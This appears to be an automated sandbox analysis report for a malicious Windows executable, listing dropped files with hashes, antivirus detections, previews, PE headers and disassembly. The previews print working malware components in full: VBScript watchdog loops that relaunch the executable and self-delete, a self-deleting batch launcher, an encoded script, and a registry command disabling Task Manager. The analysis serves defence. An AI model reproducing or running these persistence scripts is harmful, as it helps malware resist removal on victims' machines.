                                  Process:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):2782208
                                  Entropy (8bit):7.685464955987241
                                  Encrypted:false
                                  SSDEEP:49152:Vk73hA8MYZbnMDVypc/Ku+hFH2utwyQy84y9Rnpx3oOo:VKhdMY4Z6cyBXtVQX4y9RnXoOo
                                  MD5:7AF97370DBD8A244A113783A7021E677
                                  SHA1:3A15EF2435B16954403930D061D598EF1CA48E1F
                                  SHA-256:B10060B21CB1941F76925B372BEC819C564CDD69B644296161E63F8F199CF2DA
                                  SHA-512:AA05D77154058960AD0BDADE092FB24C214D7E5895AF73B4D76E43A491437F4B96DA9650951725A99AD9451FE249AC461BB1D92A89A1DE0C0CB5FAD9EFB1E36A
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 88%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:*..6.......Y*.. ...`*...@.. ........................*...........@..................................X*.K.....*.......................*...................................................... ............... ..H............text...$9*.. ...:*................. ..`.sdata.../...`*..0...>*.............@....rsrc.........*......n*.............@..@.reloc........*......r*.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):499
                                  Entropy (8bit):5.325648469563751
                                  Encrypted:false
                                  SSDEEP:12:9vWdDIyRfhMAyjMpML34jVIwZlEe+o0BMhFiXAp4QCk3:9A3fCAyjI2wZlFcMDYAp4QCw
                                  MD5:B36DE1883BE6A7B9246145246873C6E0
                                  SHA1:0A2644F0D66CDB4F9F62D3E8B854BDDAAF6229ED
                                  SHA-256:75A9977822BF3D523E77D124463489DE41260C9AE18E2FA56A8EFD369C22D5AA
                                  SHA-512:A4089BB47FA94A1F65A2392A8660F59EB4F6F00FED1FABA86BDBDA31C80FF70AA147735DA5A36E438693F43FF347C8E6190C10DE59253DB6A1A3122D30887942
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:On Error Resume Next....Dim mainFilePath..Dim backupFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....mainFilePath = "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"..backupFilePath = "C:\Users\user\AppData\Local\Temp\826f54c5c35521aef4aae8ba444affffb02e2dfd.exe"....Do While True...If Not FSO.FileExists(mainFilePath) Then....WS.Exec(backupFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop
                                  Process:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):724
                                  Entropy (8bit):5.269512489817243
                                  Encrypted:false
                                  SSDEEP:12:9vWdTzyMsRfhMA6KdjMpML34juouurv3vAGThYsTaHozv/K/ynMaSxqjdxWg9VbT:9AnyHfCATdjI5pD/AEmHob/uhEjdxWgr
                                  MD5:3344D90CA0BB89375EBC229320DC6FFB
                                  SHA1:F373D06F2D006A81510A2510D9D570AC80D00324
                                  SHA-256:E408DDB913CA48BB39440E16B08F0E7752195487EB3C7E18E4EEBC8BEF5C1952
                                  SHA-512:44CE840FFC7FBE79CA7CCA911E2E78BA1E1DCFFAA5E061F4CA48D737B9C1E5C4E17A93575C5B9119533C4B71B391BDCFB0ABCC91944F2F1BC3250C2A1EDF9099
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:On Error Resume Next....Dim processId..Dim mainFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....processId = "5376"..mainFilePath = "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"....Do While True...Dim isExists...isExists = false.....Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")...sQuery = "SELECT * FROM Win32_Process"...Set objItems = objWMIService.ExecQuery(sQuery).....For Each objItem In objItems....if(Trim(objItem.ProcessId) = Trim(processId)) Then .....isExists = true.....Exit For....End If...Next.....if(isExists = false) Then....WS.Exec(mainFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop
                                  Process:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):724
                                  Entropy (8bit):5.263987627938791
                                  Encrypted:false
                                  SSDEEP:12:9vWdTzyMsRfhMA6Kq4jMpML34juouurv3vAGThYsTaHozv/K/ynMaSxqjdxWg9VX:9AnyHfCATtjI5pD/AEmHob/uhEjdxWgr
                                  MD5:D8DB42A35ACBE85855AAC22865AC5721
                                  SHA1:53479617F05C9C791526151FD1D49E7CE1B0767F
                                  SHA-256:A453ADF3B29EDFC9DB9BFAFD11E9137C3FD078AA3A1785AC9C15DE511FC4FA5F
                                  SHA-512:706CB4B7E5E6CFAF29FCB226856C11C305AE17A8E83B801E308C45B2EBCBDCDFD2FE6480C7907F99F98D4D78EA00FB300E6C76E25CA0EEF10FBA901F66768204
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:On Error Resume Next....Dim processId..Dim mainFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....processId = "3420"..mainFilePath = "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"....Do While True...Dim isExists...isExists = false.....Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")...sQuery = "SELECT * FROM Win32_Process"...Set objItems = objWMIService.ExecQuery(sQuery).....For Each objItem In objItems....if(Trim(objItem.ProcessId) = Trim(processId)) Then .....isExists = true.....Exit For....End If...Next.....if(isExists = false) Then....WS.Exec(mainFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop
                                  Process:C:\portcontainerRef\SurrogateContainerAgent.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):25
                                  Entropy (8bit):4.293660689688184
                                  Encrypted:false
                                  SSDEEP:3:0oOWoM:eWoM
                                  MD5:E4CBE41864463AC82FFF7E9F971E3C5F
                                  SHA1:0EEA27792E671D2E7A323D366E3C412ACDA27B0E
                                  SHA-256:57E5331AD330D8032666994E78AA78C01D188A092C9641C5A68A5FEC189599CA
                                  SHA-512:6CCB36785C00C174FF200D6775F8C6AC2B55E57935C34CE34FBF621D1BC2A12C3C294ECA3D0051036E0269FC3D936B898F0DF2B8D8648D23F9217492220E108F
                                  Malicious:false
                                  Preview:lr0FF2e7u3JbdiwCTZdFDoLMi
                                  Process:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):724
                                  Entropy (8bit):5.265707396582211
                                  Encrypted:false
                                  SSDEEP:12:9vWdTzyMsRfhMA6KbFjMpML34juouurv3vAGThYsTaHozv/K/ynMaSxqjdxWg9VX:9AnyHfCATbFjI5pD/AEmHob/uhEjdxWo
                                  MD5:0916B74B80E35C3402FD11DECBFEBCCD
                                  SHA1:017A89195867C1139FE857B817CD7CE03AABDEE2
                                  SHA-256:0414F26B6BE7C05F319A95FD9E9FD19BAD22D375F80D3F53030DC999B518C0D6
                                  SHA-512:68D18424BC4B1136D041A08CB73C821B57A596BD0C4FFC81F1656471E4658E9A2F35DADD0B043186BAEE2B04D93A42CC561FD456D88C388EC5EAFD338FD0FC51
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:On Error Resume Next....Dim processId..Dim mainFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....processId = "5336"..mainFilePath = "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"....Do While True...Dim isExists...isExists = false.....Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")...sQuery = "SELECT * FROM Win32_Process"...Set objItems = objWMIService.ExecQuery(sQuery).....For Each objItem In objItems....if(Trim(objItem.ProcessId) = Trim(processId)) Then .....isExists = true.....Exit For....End If...Next.....if(isExists = false) Then....WS.Exec(mainFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop
                                  Process:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):724
                                  Entropy (8bit):5.267792721173823
                                  Encrypted:false
                                  SSDEEP:12:9vWdTzyMsRfhMA6K+jjMpML34juouurv3vAGThYsTaHozv/K/ynMaSxqjdxWg9VX:9AnyHfCATmjI5pD/AEmHob/uhEjdxWgr
                                  MD5:199CC6997FBE0DDD89EF8012E0000872
                                  SHA1:618BCA851F498951A655757A95F6030B353BE9F3
                                  SHA-256:1F5592815BFBB86614C6560FCB71CA596F72932949B3ACC8258A976ECA9E6F9C
                                  SHA-512:C6FF9914C64D4C5EA328550E16E067736ECE918F1B8855A598A5F9C67AD2A75184C7CF3D84CE6CB8F281B30C0EB6C0D42CCB5574F303A1B43E2CC74FC883C444
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:On Error Resume Next....Dim processId..Dim mainFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....processId = "4460"..mainFilePath = "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"....Do While True...Dim isExists...isExists = false.....Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")...sQuery = "SELECT * FROM Win32_Process"...Set objItems = objWMIService.ExecQuery(sQuery).....For Each objItem In objItems....if(Trim(objItem.ProcessId) = Trim(processId)) Then .....isExists = true.....Exit For....End If...Next.....if(isExists = false) Then....WS.Exec(mainFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop
                                  Process:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):499
                                  Entropy (8bit):5.325648469563751
                                  Encrypted:false
                                  SSDEEP:12:9vWdDIyRfhMAyjMpML34jVIwZlEe+o0BMhFiXAp4QCk3:9A3fCAyjI2wZlFcMDYAp4QCw
                                  MD5:B36DE1883BE6A7B9246145246873C6E0
                                  SHA1:0A2644F0D66CDB4F9F62D3E8B854BDDAAF6229ED
                                  SHA-256:75A9977822BF3D523E77D124463489DE41260C9AE18E2FA56A8EFD369C22D5AA
                                  SHA-512:A4089BB47FA94A1F65A2392A8660F59EB4F6F00FED1FABA86BDBDA31C80FF70AA147735DA5A36E438693F43FF347C8E6190C10DE59253DB6A1A3122D30887942
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:On Error Resume Next....Dim mainFilePath..Dim backupFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....mainFilePath = "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"..backupFilePath = "C:\Users\user\AppData\Local\Temp\826f54c5c35521aef4aae8ba444affffb02e2dfd.exe"....Do While True...If Not FSO.FileExists(mainFilePath) Then....WS.Exec(backupFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop
                                  Process:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):724
                                  Entropy (8bit):5.268469827521438
                                  Encrypted:false
                                  SSDEEP:12:9vWdTzyMsRfhMA6KijMpML34juouurv3vAGThYsTaHozv/K/ynMaSxqjdxWg9VbT:9AnyHfCATijI5pD/AEmHob/uhEjdxWgr
                                  MD5:B6E08A0656652882E8FCA165C74F7F3E
                                  SHA1:4C030BBC58882584C9B01C7D7289FCC87D4488DA
                                  SHA-256:2691A42C770B955DD480E57D4FA3B30DEB886DE4091D426E13E72E42B9D45DDB
                                  SHA-512:99CB03BFC24D33102C8B369F40561C3D9AEF52BA6F07C8BB8686F3BEC12C4CEB1DDB12754D7707FC54859C7E6B8C8261A41CA29F754AA05AC19D7CDC9C09EC17
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:On Error Resume Next....Dim processId..Dim mainFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....processId = "2156"..mainFilePath = "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"....Do While True...Dim isExists...isExists = false.....Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")...sQuery = "SELECT * FROM Win32_Process"...Set objItems = objWMIService.ExecQuery(sQuery).....For Each objItem In objItems....if(Trim(objItem.ProcessId) = Trim(processId)) Then .....isExists = true.....Exit For....End If...Next.....if(isExists = false) Then....WS.Exec(mainFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop
                                  Process:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):499
                                  Entropy (8bit):5.325648469563751
                                  Encrypted:false
                                  SSDEEP:12:9vWdDIyRfhMAyjMpML34jVIwZlEe+o0BMhFiXAp4QCk3:9A3fCAyjI2wZlFcMDYAp4QCw
                                  MD5:B36DE1883BE6A7B9246145246873C6E0
                                  SHA1:0A2644F0D66CDB4F9F62D3E8B854BDDAAF6229ED
                                  SHA-256:75A9977822BF3D523E77D124463489DE41260C9AE18E2FA56A8EFD369C22D5AA
                                  SHA-512:A4089BB47FA94A1F65A2392A8660F59EB4F6F00FED1FABA86BDBDA31C80FF70AA147735DA5A36E438693F43FF347C8E6190C10DE59253DB6A1A3122D30887942
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:On Error Resume Next....Dim mainFilePath..Dim backupFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....mainFilePath = "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"..backupFilePath = "C:\Users\user\AppData\Local\Temp\826f54c5c35521aef4aae8ba444affffb02e2dfd.exe"....Do While True...If Not FSO.FileExists(mainFilePath) Then....WS.Exec(backupFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop
                                  Process:C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):499
                                  Entropy (8bit):5.325648469563751
                                  Encrypted:false
                                  SSDEEP:12:9vWdDIyRfhMAyjMpML34jVIwZlEe+o0BMhFiXAp4QCk3:9A3fCAyjI2wZlFcMDYAp4QCw
                                  MD5:B36DE1883BE6A7B9246145246873C6E0
                                  SHA1:0A2644F0D66CDB4F9F62D3E8B854BDDAAF6229ED
                                  SHA-256:75A9977822BF3D523E77D124463489DE41260C9AE18E2FA56A8EFD369C22D5AA
                                  SHA-512:A4089BB47FA94A1F65A2392A8660F59EB4F6F00FED1FABA86BDBDA31C80FF70AA147735DA5A36E438693F43FF347C8E6190C10DE59253DB6A1A3122D30887942
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:On Error Resume Next....Dim mainFilePath..Dim backupFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....mainFilePath = "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"..backupFilePath = "C:\Users\user\AppData\Local\Temp\826f54c5c35521aef4aae8ba444affffb02e2dfd.exe"....Do While True...If Not FSO.FileExists(mainFilePath) Then....WS.Exec(backupFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop
                                  Process:C:\portcontainerRef\SurrogateContainerAgent.exe
                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):212
                                  Entropy (8bit):5.166156496265179
                                  Encrypted:false
                                  SSDEEP:6:hITg3Nou11r+DEmL34jqKOZG1qLTwi23fs:OTg9YDEmL34jEwZU
                                  MD5:CEA8F798BDEE851F68BD57FE7A6F8D92
                                  SHA1:7BA2BECE7E0046185E11670BF3E2803EF449604D
                                  SHA-256:E2F8D9D7A3880FFD4289BFECB15840866C6D6883B8769202A3FEF3F9AB3B9417
                                  SHA-512:6B0C849094322DEFF6B3F7CD05639A0AC9EF770D0960AA2D9BC4DAAF7757C1BFD8554BA9F3D56E8AD5827E226AED56754FCAE1A4A9255D2F2F61FDDED07170B9
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\suxlltqCa3.bat"
                                  Process:C:\portcontainerRef\SurrogateContainerAgent.exe
                                  File Type:ASCII text, with very long lines (645), with no line terminators
                                  Category:dropped
                                  Size (bytes):645
                                  Entropy (8bit):5.863994949969072
                                  Encrypted:false
                                  SSDEEP:12:z5R+GR2xgXiPLna2uyVI/wKYi8UffM5FdxcjK8jcYxRzAtC2bZAmuAjfJsf/nIKx:z+GRP0BG38UffM5Fd6jBQYxRWDL1KIKx
                                  MD5:EB45FA3DDA1FDA4FDCCBB9AE1C0BE9EB
                                  SHA1:7BCB733506829232BE12EA29F3B3F2F6CFD0CB26
                                  SHA-256:A74506EA28CF7055D3B7D0B563E7873249DF39103D6E4B61624EEF295D4F519A
                                  SHA-512:72288690B4119B2A81FF2382B98E317FEEC562C1B7019E09CB8C0B8C83184F817C7CEB9A53B0BA74D3B9239855B9B77DF7A5E8D59A4256785A449869A629DD20
                                  Malicious:false
                                   Preview:
                                  Process:C:\Users\user\Desktop\adKGhCOOzg.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):161
                                  Entropy (8bit):4.951181800240838
                                  Encrypted:false
                                  SSDEEP:3:I5Sg+0XpCaxAmEEMLAXLuRLNZFQNBZwXD9so3KRfyM1K7eB/k+7W34hebJNAKyMG:IeDEMrRJMTStuH1jhRiI36BY
                                  MD5:371DA64FC84F83CB1B5AE7FABA9927FE
                                  SHA1:3526490D11640D16C32AD6DCDDBC78CF018686A2
                                  SHA-256:E3D7262FB87454906DB6BB5B65F6168530B85D07F14DE69DEE92DA03180AFB29
                                  SHA-512:6403EF908EC22260F2BF5115D65EB281ABA3CD285B552A6F1FA1C1C9BA799A871D05E6567D8BA04CE1B994E97DAC6E75709E64EB0AE213AF7380274AB40D0552
                                  Malicious:false
                                  Preview:"C:\portcontainerRef\SurrogateContainerAgent.exe" & reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                  Process:C:\Users\user\Desktop\adKGhCOOzg.exe
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):2782208
                                  Entropy (8bit):7.685464955987241
                                  Encrypted:false
                                  SSDEEP:49152:Vk73hA8MYZbnMDVypc/Ku+hFH2utwyQy84y9Rnpx3oOo:VKhdMY4Z6cyBXtVQX4y9RnXoOo
                                  MD5:7AF97370DBD8A244A113783A7021E677
                                  SHA1:3A15EF2435B16954403930D061D598EF1CA48E1F
                                  SHA-256:B10060B21CB1941F76925B372BEC819C564CDD69B644296161E63F8F199CF2DA
                                  SHA-512:AA05D77154058960AD0BDADE092FB24C214D7E5895AF73B4D76E43A491437F4B96DA9650951725A99AD9451FE249AC461BB1D92A89A1DE0C0CB5FAD9EFB1E36A
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 88%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:*..6.......Y*.. ...`*...@.. ........................*...........@..................................X*.K.....*.......................*...................................................... ............... ..H............text...$9*.. ...:*................. ..`.sdata.../...`*..0...>*.............@....rsrc.........*......n*.............@..@.reloc........*......r*.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\adKGhCOOzg.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):214
                                  Entropy (8bit):5.837679066205144
                                  Encrypted:false
                                  SSDEEP:6:G3wqK+NkLzWbHhE18nZNDd3RL1wQJRAJDL4W6/YWs:G+MCzWLy14d3XBJGJKQ1
                                  MD5:AAE82A345D8F0A5AC210D8953D1AFFE6
                                  SHA1:9117A1BEF411A4FD79AE0866363E8ADC3FE9126E
                                  SHA-256:9D5D31A9259C91C5E687D754BB203DD4E6DC546C28530970868D6B1D173CAE05
                                  SHA-512:EFAA59A4F026FD04DB780A00296733DD840725EA357E13563CA4A7871F16934E3DD824B967D2CC7DBB2E68BF6EFFA784B624B3BDDE78A11B9D097B19FAFB74C4
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:#@~^vQAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v%T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJwGMY1WxDlbU+MIn0J9f*UZKGnx$ ZA.r}N3}EWR8CDJSPZSP6lsd.VTwAAA==^#~@.
                                  Process:C:\portcontainerRef\SurrogateContainerAgent.exe
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):2782208
                                  Entropy (8bit):7.685464955987241
                                  Encrypted:false
                                  SSDEEP:49152:Vk73hA8MYZbnMDVypc/Ku+hFH2utwyQy84y9Rnpx3oOo:VKhdMY4Z6cyBXtVQX4y9RnXoOo
                                  MD5:7AF97370DBD8A244A113783A7021E677
                                  SHA1:3A15EF2435B16954403930D061D598EF1CA48E1F
                                  SHA-256:B10060B21CB1941F76925B372BEC819C564CDD69B644296161E63F8F199CF2DA
                                  SHA-512:AA05D77154058960AD0BDADE092FB24C214D7E5895AF73B4D76E43A491437F4B96DA9650951725A99AD9451FE249AC461BB1D92A89A1DE0C0CB5FAD9EFB1E36A
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 88%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:*..6.......Y*.. ...`*...@.. ........................*...........@..................................X*.K.....*.......................*...................................................... ............... ..H............text...$9*.. ...:*................. ..`.sdata.../...`*..0...>*.............@....rsrc.........*......n*.............@..@.reloc........*......r*.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\w32tm.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):151
                                  Entropy (8bit):4.842311201176073
                                  Encrypted:false
                                  SSDEEP:3:VLV993J+miJWEoJ8FXuKFzbH5k6vpIc66vj:Vx993DEUS5z5ug
                                  MD5:566A6A2BF7DD69A23A1FCAEF4D4AC75C
                                  SHA1:BD0DEF6889997567DA402A79F7AAB59A0952BE14
                                  SHA-256:E8B2C27DAA82926B959FC365466F9B5EAFEE9EBADCE601B54FD2CA1C7D94F8B8
                                  SHA-512:FF8A2A71B84BBF62A63DC103FF77D0D768B9E67E7DDB7E7B0D789AA45C6FA20BA1934286E0733CDE56D5C4B5F95621706520E01BF2B6F1564E51A643EEF0DF78
                                  Malicious:false
                                  Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 27/09/2024 04:39:11..04:39:11, error: 0x80072746.04:39:17, error: 0x80072746.
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.628383756746391
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  • DOS Executable Generic (2002/1) 0.01%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:adKGhCOOzg.exe
                                  File size:3'099'403 bytes
                                  MD5:3b5ae0315b4623a6bd2c711bc8b8e28f
                                  SHA1:ff99120c5150373aba0c519417fa4b545c70d4ca
                                  SHA256:af20afbe249de8d37ecdae69670fdced02fdfbbfdf7a1f2810e7628b52e29e4c
                                  SHA512:61f363a058f3e713b8fbe8234432f589ca38a41243a3bbeb36fef05c95f15501dc158fee0d00f148f15b81670321696d0446fb2ffd983771c398ab279c1a626d
                                  SSDEEP:49152:UbA30ck73hA8MYZbnMDVypc/Ku+hFH2utwyQy84y9Rnpx3oOof:Ub4KhdMY4Z6cyBXtVQX4y9RnXoOof
                                  TLSH:28E5E0027F508A11F1191637D2EF854847B4ED512AAAE32B7EBD376D99123933C0DACB
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..
                                  Icon Hash:1515d4d4442f2d2d
                                  Entrypoint:0x41ec40
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:fcf1390e9ce472c7270447fc5c61a0c1
                                  Instruction
                                  call 00007F985D104609h
                                  jmp 00007F985D10401Dh
                                  cmp ecx, dword ptr [0043E668h]
                                  jne 00007F985D104195h
                                  ret
                                  jmp 00007F985D10478Eh
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  push ebp
                                  mov ebp, esp
                                  push esi
                                  push dword ptr [ebp+08h]
                                  mov esi, ecx
                                  call 00007F985D0F6F27h
                                  mov dword ptr [esi], 00435580h
                                  mov eax, esi
                                  pop esi
                                  pop ebp
                                  retn 0004h
                                  and dword ptr [ecx+04h], 00000000h
                                  mov eax, ecx
                                  and dword ptr [ecx+08h], 00000000h
                                  mov dword ptr [ecx+04h], 00435588h
                                  mov dword ptr [ecx], 00435580h
                                  ret
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  lea eax, dword ptr [ecx+04h]
                                  mov dword ptr [ecx], 00435568h
                                  push eax
                                  call 00007F985D10732Dh
                                  pop ecx
                                  ret
                                  push ebp
                                  mov ebp, esp
                                  sub esp, 0Ch
                                  lea ecx, dword ptr [ebp-0Ch]
                                  call 00007F985D0F6EBEh
                                  push 0043B704h
                                  lea eax, dword ptr [ebp-0Ch]
                                  push eax
                                  call 00007F985D106A42h
                                  int3
                                  push ebp
                                  mov ebp, esp
                                  sub esp, 0Ch
                                  lea ecx, dword ptr [ebp-0Ch]
                                  call 00007F985D104134h
                                  push 0043B91Ch
                                  lea eax, dword ptr [ebp-0Ch]
                                  push eax
                                  call 00007F985D106A25h
                                  int3
                                  jmp 00007F985D108A73h
                                  jmp dword ptr [00433260h]
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  push 00421EB0h
                                  push dword ptr fs:[00000000h]
                                  Programming Language:
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [C++] VS2015 UPD3.1 build 24215
                                  • [EXP] VS2015 UPD3.1 build 24215
                                  • [RES] VS2015 UPD3 build 24213
                                  • [LNK] VS2015 UPD3.1 build 24215
                                   Name | Virtual Address | Virtual Size | Is in Section
                                   IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3c820 | 0x34 | .rdata
                                   IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3c854 | 0x3c | .rdata
                                   IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x63000 | 0xdfd0 | .rsrc
                                   IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x71000 | 0x2268 | .reloc
                                   IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3aac0 | 0x54 | .rdata
                                   IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
